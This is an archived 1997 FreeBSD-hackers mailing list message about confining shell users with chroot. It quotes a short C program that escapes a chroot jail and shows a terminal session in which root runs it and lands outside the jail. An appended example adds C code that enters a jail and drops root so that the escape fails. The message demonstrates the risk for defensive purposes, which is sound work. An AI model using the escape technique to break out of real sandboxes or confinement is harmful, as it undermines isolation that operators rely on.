From owner-freebsd-hackers Thu May 29 17:50:55 1997
Message-ID: <338E21F7.446B9B3D@whistle.com>
Date: Thu, 29 May 1997 17:40:23 -0700
From: Julian Elischer
Organization: Whistle Communications
To: Warner Losh
CC: Terry Lambert, dec@phoenix.its.rpi.edu, peter@grendel.IAEhv.nl, mrcpu@cdsnet.net, hackers@FreeBSD.ORG
Subject: Re: Correct way to chroot for shell account users?
References: <199705291456.HAA03526@phaeton.artisoft.com>

Warner Losh wrote:
> In fact here is a program to give you a root shell out of the chroot environ.. I just tested it it works
> Michael Smith posted the program to climb out of the jail here a few
> months ago. This isn't theoretical, but it works. It was something
> along the lines of the following. You can find it in the archives.
>
> #include
> main(int argc, char **argv)
> {
>     mkdir("foo");
>     chroot("foo");
>     chdir(".."); chdir(".."); chdir(".."); chdir(".."); chdir("..");
>     chdir(".."); chdir(".."); chdir(".."); chdir(".."); chdir("..");
>     chdir(".."); chdir(".."); chdir(".."); chdir(".."); chdir("..");
>     chroot(".");
>     execl("/bin/sh", "sh", NULL);
> }

built1% cd /
built1% df .
Filesystem  1K-blocks     Used    Avail Capacity  Mounted on
/dev/sd0a       38991    24797    11075    69%    /
built1% sudo chroot /work/julian/2.2R2
# df .
Filesystem  1K-blocks     Used    Avail Capacity  Mounted on
/dev/sd1s1f   2033631  1741315   129626    93%    /work
# cd /tmp
# cat >xx.c
[type in file above]
# make xx
cc -O xx.c -o xx
# exec ./xx
# df .
Filesystem  1K-blocks     Used    Avail Capacity  Mounted on
/dev/sd0a       38991    24797    11075    69%    /
# exit
built1%
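
An added example, not part of the original message or of FreeBSD: the session above works because the shell inside the chroot still runs as root, so one defensive pattern is to enter the jail with the working directory already inside it and then drop root irreversibly before running anything. The function name enter_jail, its return codes and the uid/gid 65534 are assumptions made for this sketch.

```c
#define _DEFAULT_SOURCE          /* expose chroot() and setgroups() on glibc */
#include <grp.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Return codes (names are this example's own). */
enum { JAIL_OK = 0, JAIL_EROOT = -1, JAIL_EDIR = -2, JAIL_ECHROOT = -3, JAIL_EPRIV = -4 };

/* Confine the calling process to dir and give up root for good. */
int enter_jail(const char *dir, uid_t uid, gid_t gid)
{
    /* chroot(2) is a privileged call, so a process that stays uid 0 inside
       the jail can call it again, which is what the posted program relies on. */
    if (uid == 0 || gid == 0)
        return JAIL_EROOT;
    /* Move inside first so the working directory is never outside the new root. */
    if (chdir(dir) != 0)
        return JAIL_EDIR;
    if (chroot(".") != 0 || chdir("/") != 0)
        return JAIL_ECHROOT;
    /* Groups, then gid, then uid: after setuid() the others can no longer be changed. */
    if (setgroups(1, &gid) != 0 || setgid(gid) != 0 || setuid(uid) != 0)
        return JAIL_EPRIV;
    /* Verify the drop cannot be undone before running anything else. */
    if (setuid(0) == 0 || getuid() != uid || geteuid() != uid)
        return JAIL_EPRIV;
    return JAIL_OK;
}

int main(int argc, char **argv)
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s jaildir\n", argv[0]);
        return 2;
    }
    /* 65534 is a constructed placeholder for an unprivileged account. */
    int rc = enter_jail(argv[1], 65534, 65534);
    if (rc != JAIL_OK) {
        fprintf(stderr, "enter_jail failed: %d\n", rc);
        return 1;
    }
    execl("/bin/sh", "sh", (char *)NULL);
    perror("execl");
    return 1;
}
```

Run as root against a populated jail directory, the resulting shell is unprivileged, so the second chroot() call in the quoted program is refused.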